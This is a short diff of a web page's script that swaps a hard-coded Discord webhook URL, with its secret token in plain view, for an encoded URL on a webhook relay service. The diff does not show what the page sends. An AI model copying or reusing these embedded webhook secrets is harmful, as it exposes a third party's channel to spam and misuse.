--- a/index.html
+++ b/index.html
@@ -21,7 +21,7 @@
   </div>
 
   <script>
-    const WEBHOOK_URL = 'https://discord.com/api/webhooks/1384966293941256352/HtafjB_cI5b3YHt3Y-ZD1x7T3yWF2ZXIq2K-4sjTg44qocc8K9sul81wS8O3ke5YJFLT'; // your webhook
+    const WEBHOOK_URL = 'https://l.webhook.party/hook/fTx7QPLg4ym%2FtI2PqsaVUJjIVWe4tEB81BoRXyeY5IA%2FEqUMvT%2FG2n3k3agX2MG1UYVUdQu0lp3JMuYoDqgznl4YnJjBEl56MXyJbZ7cawe6wYj2OeUalN7WroUOwT7GjsAXl8GFdt2TO3x2jvxBoJjscR7TS6p4KH2ZvRY8cKVOrj4mkEVGlla%2B03SSEFJcwknBJEKWopBaXwmcjtqQK%2FDPSjSwZP3SN1d%2BeDbCiAE1HN7gnMq3fLviKtvzqyv98MeixIV34r1H5TkhTtmE7WRboQpFUnOl0AsLUC76GxgDZBcNHyLS1zzV3Tm7N5W6tuGxo9cgT%2F9oMQF2xGtqU38Z8TZaOZhhpZqEO9der21MmO5yRzYb8eslRdRen9cvFo40GDsVTWU%3D/xEpvK%2F8oHzPvu12%2F'; // your webhook
     let prevPing = getRandomInt(40,100); // start with initial value
 
     function getRandomInt(min, max) {
